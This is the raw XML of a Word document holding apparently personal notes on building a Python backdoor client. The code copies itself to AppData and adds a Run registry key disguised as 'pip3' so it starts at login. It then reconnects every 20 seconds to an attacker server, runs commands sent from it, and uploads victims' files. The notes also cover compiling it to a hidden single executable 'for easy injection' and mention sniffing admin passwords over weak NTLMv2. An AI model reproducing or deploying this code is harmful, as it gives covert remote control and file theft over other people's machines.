          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">] + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
            <w:color w:val="AB9464"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:highlight w:val="green"/>
          </w:rPr>
          <w:t>\\</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
            <w:color w:val="CB8F76"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:highlight w:val="green"/>
          </w:rPr>
          <w:t>pip3_setup.exe</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509DF20C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65B9CA3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# If 'location' does NOT exist, it's 1st time running this Backdoor client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1394F0BC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C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">not 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os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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>path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exists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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E415C4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 xml:space="preserve"># Performing copying action of our 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Backdoor.exe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 xml:space="preserve"> to User's /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AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7023E641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shutil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copyfile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sys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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>executable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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>location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2C453497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 Allow users to proactively connect to our backdoor server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FF4AC3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 whenever they login to their machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE406BC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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE349B8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 xml:space="preserve"># Appending machine startup .exe permissions to Victims' Windows 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regkey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 xml:space="preserve"> at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8FCF25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HKEY_CURRENT_USER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>\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A73DE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 /v = Name; /t = Type; /d = Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790BD2AD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subprocess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call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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">reg add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>HKCU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">\Software\Microsoft\Windows\CurrentVersion\Run /v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>pip3</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> /t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>REG_SZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> /d "'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>'"'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>True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559E3E8B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C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D2328A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 Otherwise, just jump to steps below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E99C05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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 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socket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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>socket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socket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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AF_INET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>socket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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SOCK_STREAM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51133505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 ==========================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E5EC69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IP_ADDRESS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 xml:space="preserve"> = '192.168.31.138'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AB720D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 port = 54321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67434ADD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sock.connect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>((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IP_ADDRESS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>, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C00F1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#print(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f'Connection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 xml:space="preserve"> Established to Server!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADCCC4E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#shell()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396B35E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 ==========================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176BC743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989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC80BF7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#answer = "Server: Hello Back!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417FC62B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6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#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sock.send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>(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answer.encode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>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE22561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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sock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close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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C0D833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C32EDD3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Running the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reverse_shell.exe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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA9490" w14:textId="0BA8425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C57B102" wp14:editId="15A23A6E">
            <wp:extent cx="4629150" cy="2209800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3649660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6608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3B24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C311068" w14:textId="77777777" w:rsidR="00954A2F" w:rsidRDefault="00954A2F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454B5F4" w14:textId="77777777" w:rsidR="00954A2F" w:rsidRDefault="00954A2F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318C6A55" w14:textId="77777777" w:rsidR="00954A2F" w:rsidRDefault="00954A2F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2323C453" w14:textId="20D54A34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On our Backdoor server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2F5B60" w14:textId="1791BF58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B2E81BB" wp14:editId="77767C76">
            <wp:extent cx="4819650" cy="3267075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1900264680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64680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46B1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C91E5D2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HKEY_LOCAL_MACHINE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="242A63E3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If we use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HKEY_LOCAL_MACHINE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, the reverse shell will focus on whoever logins as long as the machine is booted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0946B098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7F16260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NTLMv2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weak network logon reference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0257EEB2" w14:textId="77777777" w:rsidR="006D2D76" w:rsidRDefault="00000000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hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="006D2D76">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="026CD2D9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Yet, we normally do NOT have the admin password of the machine, unless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E17A72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we perform a man-in-the-middle attack to sniff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adming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login password via a weak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NTLMv2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network login to a Domain Controller in an Active Directory environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2326F3" w14:textId="5EDE3701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2339AE8" wp14:editId="13708655">
            <wp:extent cx="5600700" cy="8239125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1585789505" name="Picture 2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89505" name="Picture 2" descr="A screenshot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0BAD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6E8A022" w14:textId="77777777" w:rsidR="00954A2F" w:rsidRDefault="00954A2F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2FBEA5B2" w14:textId="72D8169E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===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Compiling .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py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to .exe single file for easy injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272FD3E7" w14:textId="4D0FA477" w:rsidR="00B92E1E" w:rsidRDefault="00B92E1E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bash ./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compile.sh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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B82671B" w14:textId="791D4135" w:rsidR="00B92E1E" w:rsidRDefault="00B92E1E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B92E1E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="725B9A24" wp14:editId="3F355C14">
            <wp:extent cx="4953691" cy="4620270"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="269527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2783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9547" w14:textId="77777777" w:rsidR="00B92E1E" w:rsidRDefault="00B92E1E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7FBC881C" w14:textId="7D1A2E9F" w:rsidR="00B92E1E" w:rsidRDefault="00B92E1E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OR manually compiling &amp; deleting ./build ./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client.spec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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2986701E" w14:textId="224A60A3" w:rsidR="00B92E1E" w:rsidRDefault="00B92E1E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Compiling manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE759D5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python -m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pyinstaller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reverse_shell.py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--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onefile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--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noconsole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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751E591E" w14:textId="6D0E155B" w:rsidR="00B92E1E" w:rsidRDefault="00B92E1E" w:rsidP="006D2D7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Removing all unnecessary files &amp; folder after compiling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0CF920" w14:textId="66866276" w:rsidR="00B92E1E" w:rsidRDefault="00B92E1E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rm -rf ./build &amp;&amp; rm -rf ./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client.spec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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296E14C0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F1ED174" w14:textId="40409FF6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# Find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B92E1E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>client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.exe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in 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dist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C5648D3" w14:textId="7A296BDF" w:rsidR="006D2D76" w:rsidRPr="00B92E1E" w:rsidRDefault="00B92E1E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B92E1E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221C38FC" wp14:editId="2FC2CF79">
            <wp:extent cx="1238423" cy="628738"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1977500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071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9FE4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1C101EE" w14:textId="77777777" w:rsidR="00B92E1E" w:rsidRDefault="00B92E1E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7EE6D47A" w14:textId="5F9E2A13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lastRenderedPageBreak/>
        <w:t>client.py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0386E72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</w:p>
    <w:p w14:paraId="695E527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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628E081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json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DD8BC3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subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBA22E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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45D9374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shutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39299BE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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4E6D8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37CC4C2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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B92E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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>IP_ADDRESS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'192.168.0.16'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3393316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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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54321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DB8BE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7192A89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reliable_send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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225B290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jsondata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json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dumps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1E42194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SERVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D1B9C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target = target,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=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sock.accept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() below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D0C51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jsondata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has to be encoded to send ascii to victims as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BYTEs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7426976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</w:p>
    <w:p w14:paraId="078AB77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CLIENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAD058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use victims' socket (s) to send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jsondata.encode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() 'ascii' as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BYTEs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BB9055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send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jsondata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encode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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640E048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</w:p>
    <w:p w14:paraId="08CFFAB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reliable_recv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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD32D1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Preparing to store data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197635B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''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F8275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while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True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590B123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try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18C6DCB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SERVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200E215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Specify amount of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BYTEs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we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wanna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receive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5920C2D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Cuz data sending from victims are encoded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BYTEs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58DEB41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Need to decode it upon receiving using .decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AF292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Need to trim the fucking '\n' '\r' to avoid errors using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rstrip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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CB68E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</w:p>
    <w:p w14:paraId="4A836F2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CLIENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4C2F3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using victims' socket to receive commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BB469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+=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1024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decode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().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rstrip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638FD5E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returning results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D46C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return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json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loads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3861D81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except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ValueError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as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1CAB342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When we receive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ValueError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from execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFDBC6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We continue the execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1731804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#print(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f'Error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occurred: {e}\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nContinuing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...')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6112FAE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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3031862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</w:p>
    <w:p w14:paraId="76F5670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connection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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7D787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while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True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4B8344A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Our Server can start at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anytime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, whenever server is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EE535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lastRenderedPageBreak/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Victims will try to connect every 20 secs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2300678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time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sleep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20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618FA87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Try to connect to our Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3EA69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try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01899BA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connection() will run over &amp; over again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1725941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until victims' socket is connected to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ADF25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connect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((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B92E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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>IP_ADDRESS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zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0736F8B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Establish a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F0656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shell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3B6EE53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Close socket object once reverse shell is established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285D3BF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close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1BD22E4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Socket closed =&gt; Exit this program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694702F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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644959A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except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6D02388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Keep trying to run connection()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093FAED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connection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6B227A0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24B0C3F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Allow Server to download simple files from victims (this client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5B087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upload_file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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6185D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open File from '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' =&gt; command[9:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2759630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read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btyes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B39B58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open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rb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5FF6B52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send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read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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16910F6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5607F77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Allow SERVER to download simple files from victims (this client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE954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Callback used to download files from victims' machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A0E1D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Server =&gt; download files from victims' machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4503C46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Client =&gt; upload files to Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93579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download_file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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9465C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open file object 'f' using </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0711F51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'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wb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' =&gt; write bytes to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F42CD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***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706880B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open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wb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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741E625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***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB0760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If timeout is NOT set, sometimes program will get stuck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ADE30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settimeout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1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31EC867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#print(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f'Starting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to receive bytes in chunks from simple files...')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EFA97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</w:p>
    <w:p w14:paraId="5A46494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Receive data from multiple chunks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5576D27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try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4A75ABC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chunk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1024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1F4BA4C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As long as there's something in chunk variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FCEB3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while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chunk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08D95C8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Writing the chunk into file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C05B7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write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chunk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0F81168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664A2B6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#print(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f'Server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is writing chunks of 1024 bytes of simple files from victims...')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F2F7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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    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chunk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1024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327D7C9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If there's any errors =&gt; reached End of file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13209C5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except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timeout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as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6519C0D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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2808DEA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#print(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f'Server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has no pending 1024-byte chunks in queue...\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nExiting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...\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7751F2D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finally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1DDD59C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settimeout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None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4FCADC8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Close file upon complete sending files from victims</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347ACC5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close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65FEAA6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#print(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f'This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server is closing open-file on victims\' machines')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD22F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</w:p>
    <w:p w14:paraId="3F9331E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shell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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CED379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while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True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037B68B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Receive command from server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306BFBE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reliable_recv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39ACCB0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Exit program if 'q' is received from server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F699A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'q'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73714CA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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C97346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</w:p>
    <w:p w14:paraId="2FC15B9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'cd' command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E4388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comparing first 3 CHAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7958759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cuz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'cd path/to/target'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A5168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[: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3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]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'cd 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455EE54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From 3rd CHAR till the end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648ECEA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os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chdir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3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:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5599B74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Executing 'clear' on Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0519E36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do NOTHING in client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34FB5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'clear'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049B498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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5460320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'vim' command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096C380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From beginning to 4th CHAR = 'vim '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ADECD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[: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4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]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'vim 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066493F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vim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test.txt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=&gt; PATH starts from 5th CHAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8DD8C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os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system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"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vim"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+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5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:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC226E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Allow Server to download files from victims (this client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B593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If command[9:] from SERVER == 'download'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557B539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this client (victims) calls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upload_file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(command[9:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7742F7A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[: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8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]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'download'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5F2306F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Starts from 9th CHAR till the end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD05C4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upload_file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9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:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D71AC8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    </w:t>
      </w:r>
    </w:p>
